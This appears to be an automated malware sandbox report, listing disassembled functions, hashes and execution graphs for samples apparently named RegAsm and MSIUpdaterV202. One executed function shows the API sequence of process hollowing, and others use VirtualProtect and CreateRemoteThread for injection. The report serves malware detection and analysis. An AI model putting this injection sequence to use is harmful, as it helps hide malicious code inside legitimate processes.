                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 54cb5dd5dd0fcd48ab24a72492a27802d376ea6492d2a81bec40712d4bc4f415
                                                                                                                                              • Instruction ID: 57d970a1a5eaa07e00c5266ac3b256e7819b63f8173c30f7784ac52c659ae5f7
                                                                                                                                              • Opcode Fuzzy Hash: 54cb5dd5dd0fcd48ab24a72492a27802d376ea6492d2a81bec40712d4bc4f415
                                                                                                                                              • Instruction Fuzzy Hash: 574117B1908304DBD320AF54D8807A7B7E8EFD5314F09466AE89947381E779D885C39A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00415216 Relevance: .1, Instructions: 128COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d78554ab80a413b14b2419e0b7bfb4f1e016b09d74d6dc94fa787bd36b60a352
                                                                                                                                              • Instruction ID: 545b315d56c03b522b5d99d20036039b40e7180db63e96aaac84a40b3ebbbfbc
                                                                                                                                              • Opcode Fuzzy Hash: d78554ab80a413b14b2419e0b7bfb4f1e016b09d74d6dc94fa787bd36b60a352
                                                                                                                                              • Instruction Fuzzy Hash: C731B272610A10CFC724CF14C892AB373B1FFAA354719416AD956CB3A0E739F851CB58
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0043822F Relevance: .1, Instructions: 107COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 584657ef151b8187a3a4750398981d09528dca47d4deaaf1de6ca309e7dd6aca
                                                                                                                                              • Instruction ID: f1f54ffedb807780357bd696c1c2a9751d85aa1e3442850fd13f11c07331e65e
                                                                                                                                              • Opcode Fuzzy Hash: 584657ef151b8187a3a4750398981d09528dca47d4deaaf1de6ca309e7dd6aca
                                                                                                                                              • Instruction Fuzzy Hash: CB3115746083419BE718CF04C5A472BB7E2BBCA709F25995DE8C607791C739EC09DB8A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00417A78 Relevance: .1, Instructions: 95COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e6945d7441c4ca921465b1a41f44629304a2dc6011dd70954a208598614fb8d4
                                                                                                                                              • Instruction ID: 7b1c09e42af0d5f6b04bbe538d6475b2e989d68743133b3e170275eba0625d42
                                                                                                                                              • Opcode Fuzzy Hash: e6945d7441c4ca921465b1a41f44629304a2dc6011dd70954a208598614fb8d4
                                                                                                                                              • Instruction Fuzzy Hash: 39217CB4918B918FC3368F34C5A4363BBF1AB12218B041A5DC5E38BB91C374F442CB59
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 004025E0 Relevance: .1, Instructions: 95COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f0bfbfb61dbf5779cf225968f8c5217ee72eb12cd5ca65c21218be2dfbc2d940
                                                                                                                                              • Instruction ID: 07de276a0e9e5309fcf8d398c85ee914db3ade285566f83fb5552bca2ba40eb8
                                                                                                                                              • Opcode Fuzzy Hash: f0bfbfb61dbf5779cf225968f8c5217ee72eb12cd5ca65c21218be2dfbc2d940
                                                                                                                                              • Instruction Fuzzy Hash: D231D8306046009BC7149E19CA88927B7E1EF85318F184D7EE8D9A73D1D67ADD53CB4A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00432140 Relevance: .1, Instructions: 64COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                              • Instruction ID: d2de3db70371d7fa33c8edf06fd931e09d60dc9d2bbf6fa126cafacc00fd25b9
                                                                                                                                              • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                              • Instruction Fuzzy Hash: BB114C33A051E40EC7168D3C8A00565BFA31AD7234F1D539AF4B49B2D2D6278D8B8369
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0043799B Relevance: .1, Instructions: 62COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e85327cca07778d5fa5c6387c8ed6258d52b71aa4bff88396f83fddc4650c8f7
                                                                                                                                              • Instruction ID: 7589fa0b55ddb035dc5953139a33f16b58e0856eb98253357792a4a2099d3379
                                                                                                                                              • Opcode Fuzzy Hash: e85327cca07778d5fa5c6387c8ed6258d52b71aa4bff88396f83fddc4650c8f7
                                                                                                                                              • Instruction Fuzzy Hash: 7511E2B04193418BD718DF14C0A066BBBF1EF8A344F545E0EE8E29B240D339D6069B5A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0043A0D9 Relevance: .0, Instructions: 35COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 423d67a1aedaa4b508aa77c2bc40276057c224fc83bd2c24f4d8f53ec03e9d94
                                                                                                                                              • Instruction ID: 5fc0ae8dc96022c44960700c7ab2adaf62af461dc2bf8e2718f495d239de32d0
                                                                                                                                              • Opcode Fuzzy Hash: 423d67a1aedaa4b508aa77c2bc40276057c224fc83bd2c24f4d8f53ec03e9d94
                                                                                                                                              • Instruction Fuzzy Hash: 2EF06735A083019BC708CF19C09062BFBF0AF8A750F28986EA4D9D3351DB30ED558B46
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0040D2C0 Relevance: .0, Instructions: 26COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 699039870cb33442d1a4fa21481bbe1e7a2f0d085c6e2806cd73b173b10ae215
                                                                                                                                              • Instruction ID: b4944c70536aa93040e23a0d3de02e03ae6e0bd8259874742134aa93b1285e44
                                                                                                                                              • Opcode Fuzzy Hash: 699039870cb33442d1a4fa21481bbe1e7a2f0d085c6e2806cd73b173b10ae215
                                                                                                                                              • Instruction Fuzzy Hash: A7E0C266B057610BA718CDB548A01B7F7E55A87322F1CA4BED492E3244C13CC805425C
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0040FED9 Relevance: .0, Instructions: 14COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: eae7d2772a78467c0d93536fe5619a14daad1bcc9832cc0b3c97cf4b1fb97af8
                                                                                                                                              • Instruction ID: 832b43b70c8be9becace1e9a524aaac1633fa4a646e66cb56c40eb57a0982910
                                                                                                                                              • Opcode Fuzzy Hash: eae7d2772a78467c0d93536fe5619a14daad1bcc9832cc0b3c97cf4b1fb97af8
                                                                                                                                              • Instruction Fuzzy Hash: CAC04C249440015A81199B15DDE5879B3796687945740743CD90BD3260DB14E409991D
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00416582 Relevance: .0, Instructions: 12COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f3f1035c1401d21b34ad4db02c73ed8df596dac4499ff47489de15c59aee4e8d
                                                                                                                                              • Instruction ID: 8b35dc4ed4a9966cb47b13b221a0358a275917a8b9a254330dbaa609285bd0fa
                                                                                                                                              • Opcode Fuzzy Hash: f3f1035c1401d21b34ad4db02c73ed8df596dac4499ff47489de15c59aee4e8d
                                                                                                                                              • Instruction Fuzzy Hash: 72C04C3CBAD240978348CF00D990875F77AE78B212B19B12DEC5513325D534E886850C
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00439461 Relevance: .0, Instructions: 9COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 80402a54a2eb80e0272eadae08c2f832bf20fb6b3d132a6f8ec30e6a10445a34
                                                                                                                                              • Instruction ID: b9894db37ae32ee18a48b4ed2c803f881acc9e4ff8f0547e5b61e8919c04ec24
                                                                                                                                              • Opcode Fuzzy Hash: 80402a54a2eb80e0272eadae08c2f832bf20fb6b3d132a6f8ec30e6a10445a34
                                                                                                                                              • Instruction Fuzzy Hash: DBB002B8E58305AF8704DE25D480826F7F0AB5A260F11B859A495E7221D235D840CE59
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00429E94 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SysStringLen.OLEAUT32 ref: 00429E9E
                                                                                                                                                • Part of subcall function 004359F0: RtlAllocateHeap.NTDLL(?,00000000,00409E11), ref: 00435A87
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.1920199999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeapString
                                                                                                                                              • String ID: ,$0$7
                                                                                                                                              • API String ID: 983180023-2155719752
                                                                                                                                              • Opcode ID: 3014c82a8aa4ecce16e822321478b9489deaecac6dfa0ed20a8e26eb28c689a7
                                                                                                                                              • Instruction ID: c908502eda0842b721617bfb232101f265745d64272503eb8c3c42083bdf6617
                                                                                                                                              • Opcode Fuzzy Hash: 3014c82a8aa4ecce16e822321478b9489deaecac6dfa0ed20a8e26eb28c689a7
                                                                                                                                              • Instruction Fuzzy Hash: 4791D471B097918FC335CE28C4907EBBBD2AB95324F594A2DD8E58B3C1D6398845CB46
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:36.4%
                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                              Signature Coverage:0%
                                                                                                                                              Total number of Nodes:41
                                                                                                                                              Total number of Limit Nodes:2
                                                                                                                                              execution_graph 351 c60e77 354 c60e1c 351->354 352 c60f9b VirtualProtect 353 c60fd8 352->353 354->352 355 c60f2a 354->355 307 c60960 314 c60a31 307->314 308 c60a11 309 c609a0 309->308 320 c604f4 309->320 315 c60c65 314->315 316 c60a6a 314->316 315->309 316->315 317 c60f9b VirtualProtect 316->317 319 c60f2a 316->319 318 c60fd8 317->318 318->309 319->309 321 c60f50 VirtualProtect 320->321 323 c609e3 321->323 323->308 324 c60500 323->324 325 c61018 CreateRemoteThread 324->325 327 c610c3 325->327 327->308 328 c60970 329 c609a0 328->329 334 c60a31 VirtualProtect 328->334 330 c604f4 VirtualProtect 329->330 333 c60a11 329->333 331 c609e3 330->331 332 c60500 CreateRemoteThread 331->332 331->333 332->333 334->329 342 c61011 343 c61066 CreateRemoteThread 342->343 345 c610c3 343->345 346 c604df 347 c604e6 VirtualProtect 346->347 349 c60544 346->349 350 c60fd8 347->350 335 2832579 336 28325b1 335->336 336->336 337 28326bf CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 336->337 337->336 338 283278e WriteProcessMemory 337->338 339 28327d3 338->339 340 2832815 WriteProcessMemory Wow64SetThreadContext ResumeThread 339->340 341 28327d8 WriteProcessMemory 339->341 341->339

                                                                                                                                              Callgraph

                                                                                                                                              Executed Functions

                                                                                                                                              Function 02832579 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282threadinjectionmemoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 028326E8
                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 028326FB
                                                                                                                                              • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 02832719
                                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0283273D
                                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 02832768
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 028327C0
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 0283280B
                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02832849
                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 02832885
                                                                                                                                              • ResumeThread.KERNELBASE(?), ref: 02832894
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.1858269210.0000000002832000.00000040.00000800.00020000.00000000.sdmp, Offset: 02832000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_2832000_MSIUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                              • String ID: GetP$Load$aryA$ress
                                                                                                                                              • API String ID: 2687962208-977067982
                                                                                                                                              • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                              • Instruction ID: 56d843bc6c7905d5c36ba19f2af1bc8bd3325c7605327528e9f3d0137018ec08
                                                                                                                                              • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                              • Instruction Fuzzy Hash: 3EB1E47660028AAFDB60CF68CC80BDA77A5FF88714F158124EA0CEB345D774FA418B94
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00C60A31 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 476COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 23 c60a31-c60a64 24 c60c65-c60c6c 23->24 25 c60a6a-c60a6f 23->25 26 c60a71-c60a84 25->26 27 c60aab-c60ab0 25->27 26->27 28 c60a86-c60a99 26->28 31 c60ab7-c60abc 27->31 28->27 29 c60a9b-c60aa9 28->29 29->31 32 c60ac2-c60ad5 31->32 33 c60c6d-c60cd2 31->33 32->33 34 c60adb-c60aec 32->34 41 c60cd5-c60d0c 33->41 34->33 36 c60af2-c60b32 34->36 36->33 45 c60b38-c60b55 36->45 51 c60f34-c60fd6 VirtualProtect 41->51 52 c60d12-c60d2f 41->52 49 c60b5c-c60b77 45->49 49->33 61 c60b7d-c60bbc 49->61 59 c60fdf-c61000 51->59 60 c60fd8-c60fde 51->60 52->51 56 c60d35-c60d53 52->56 56->41 65 c60d55-c60d5d 56->65 60->59 61->33 82 c60bc2-c60bd2 61->82 66 c60d60-c60d67 65->66 68 c60daf-c60db8 66->68 69 c60d69-c60d70 66->69 68->51 71 c60dbe-c60dce 68->71 69->68 70 c60d72-c60d7e 69->70 70->51 74 c60d84-c60d8e 70->74 71->51 72 c60dd4-c60de2 71->72 72->51 75 c60de8-c60df5 72->75 74->51 76 c60d94-c60da3 74->76 75->51 77 c60dfb-c60e0b 75->77 79 c60da5-c60dab 76->79 80 c60dac 76->80 77->66 81 c60e11-c60e19 77->81 79->80 80->68 83 c60e1c-c60e28 81->83 82->33 84 c60bd8-c60be8 82->84 85 c60e2e-c60e37 83->85 86 c60f1d-c60f24 83->86 84->33 87 c60bee-c60bff 84->87 88 c60e40-c60e4f 85->88 89 c60e39-c60e3f 85->89 86->83 90 c60f2a-c60f31 86->90 87->33 91 c60c01-c60c12 87->91 88->51 92 c60e55-c60e61 88->92 89->88 91->33 93 c60c14-c60c27 91->93 94 c60e63-c60e69 92->94 95 c60e6a-c60e85 92->95 93->33 96 c60c29-c60c3a 93->96 94->95 95->51 100 c60e8b-c60e99 95->100 96->33 98 c60c3c-c60c4d 96->98 98->33 99 c60c4f-c60c5f 98->99 99->24 99->25 100->51 101 c60e9f-c60eac 100->101 101->51 102 c60eb2-c60ec2 101->102 102->51 103 c60ec4-c60edc 102->103 104 c60ee6-c60ef1 103->104 105 c60ede-c60ee5 103->105 104->51 106 c60ef3-c60f00 104->106 105->104 106->51 107 c60f02-c60f17 106->107 107->85 107->86
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.1857875694.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_c60000_MSIUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                              • Opcode ID: 7e27c79b907673a37185626674c14ad4097dd906ab7f30f41bcbf928c4a12fa7
                                                                                                                                              • Instruction ID: 70a40bbac905294159e7098ae9cdbd12f30972bf3d928619be1bae0ee494fa61
                                                                                                                                              • Opcode Fuzzy Hash: 7e27c79b907673a37185626674c14ad4097dd906ab7f30f41bcbf928c4a12fa7
                                                                                                                                              • Instruction Fuzzy Hash: 67126C319002558FCB15CFA9C480AADFFF1AF59310F69C699E499AB266C730FD81CB94
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00C604DF Relevance: 2.0, APIs: 1, Instructions: 494memoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 108 c604df-c604e4 109 c604e6-c60fd6 VirtualProtect 108->109 110 c60544-c6084e 108->110 118 c60fdf-c61000 109->118 119 c60fd8-c60fde 109->119 111 c60850-c60876 110->111 112 c60878-c608bb 110->112 111->112 119->118
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(03833584,?,?,?), ref: 00C60FC9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.1857875694.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_c60000_MSIUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                              • Opcode ID: 05448ade7f97bf6cc7fb0cf2d73804f915c0dd8d9c4fa25917b63aa3aad6cd5b
                                                                                                                                              • Instruction ID: 79e8414243ae9cf4ad27645d4929934941a525ca91516b3f6aaa86ae79a225b0
                                                                                                                                              • Opcode Fuzzy Hash: 05448ade7f97bf6cc7fb0cf2d73804f915c0dd8d9c4fa25917b63aa3aad6cd5b
                                                                                                                                              • Instruction Fuzzy Hash: C9418F718097899FCB02DFA9D8906DDBFB0EF4A310F10419AD494EB2A2C3345949DBA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00C60500 Relevance: 1.6, APIs: 1, Instructions: 69threadinjectionCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 123 c60500-c61072 126 c61074-c61080 123->126 127 c61082-c610c1 CreateRemoteThread 123->127 126->127 128 c610c3-c610c9 127->128 129 c610ca-c610de 127->129 128->129
                                                                                                                                              APIs
                                                                                                                                              • CreateRemoteThread.KERNELBASE(-00000001,00000000,?,?,00000000,?,?), ref: 00C610B4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.1857875694.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_c60000_MSIUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateRemoteThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4286614544-0
                                                                                                                                              • Opcode ID: 6a008ce9f013211d044c5bed56ea590968ae33129d02e3c245f3036614baa116
                                                                                                                                              • Instruction ID: c6fdd7a69c074aeadf64afbd79b2e3086cf90dd3e1115400eecec1ab2c4e4cc1
                                                                                                                                              • Opcode Fuzzy Hash: 6a008ce9f013211d044c5bed56ea590968ae33129d02e3c245f3036614baa116
                                                                                                                                              • Instruction Fuzzy Hash: 8031F5B5900249DFCF10CF9AD984ADEBBF5FB48310F24802AE919A7350D375AA50CFA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00C61011 Relevance: 1.6, APIs: 1, Instructions: 68threadinjectionCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 131 c61011-c61072 133 c61074-c61080 131->133 134 c61082-c610c1 CreateRemoteThread 131->134 133->134 135 c610c3-c610c9 134->135 136 c610ca-c610de 134->136 135->136
                                                                                                                                              APIs
                                                                                                                                              • CreateRemoteThread.KERNELBASE(-00000001,00000000,?,?,00000000,?,?), ref: 00C610B4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.1857875694.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_c60000_MSIUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateRemoteThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4286614544-0
                                                                                                                                              • Opcode ID: cfd03e9a5fdba3d23e551e177479618ecf7eb1e33ac3135546d92f07ab38d5f4
                                                                                                                                              • Instruction ID: 176682e380120ca4eddc99aa4164a0737c7bcfa6dc9d4a38e4ff3f160c48e610
                                                                                                                                              • Opcode Fuzzy Hash: cfd03e9a5fdba3d23e551e177479618ecf7eb1e33ac3135546d92f07ab38d5f4
                                                                                                                                              • Instruction Fuzzy Hash: BB31F0B1900289DFCF10CF99D984ADEBFF0FB48310F24802AE918A7250D375AA54CFA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00C604F4 Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 138 c604f4-c60fd6 VirtualProtect 141 c60fdf-c61000 138->141 142 c60fd8-c60fde 138->142 142->141
                                                                                                                                              APIs
                                                                                                                                              • VirtualProtect.KERNELBASE(03833584,?,?,?), ref: 00C60FC9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000008.00000002.1857875694.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_8_2_c60000_MSIUpdaterV202.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                              • Opcode ID: 88451fa04d48b4993b1081493d5ccbcfe7a06395aef61cbb8429c210d05e1024
                                                                                                                                              • Instruction ID: 18a9f90adedac21008db590f435925893db3d6543ad14617b192d7289d2da1a9
                                                                                                                                              • Opcode Fuzzy Hash: 88451fa04d48b4993b1081493d5ccbcfe7a06395aef61cbb8429c210d05e1024
                                                                                                                                              • Instruction Fuzzy Hash: 8321E2B5901219AFDB10DF9AD884BDEFBF4FB08320F10812AE918B7250D374A954CBA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:41.7%
                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                              Signature Coverage:0%
                                                                                                                                              Total number of Nodes:44
                                                                                                                                              Total number of Limit Nodes:1
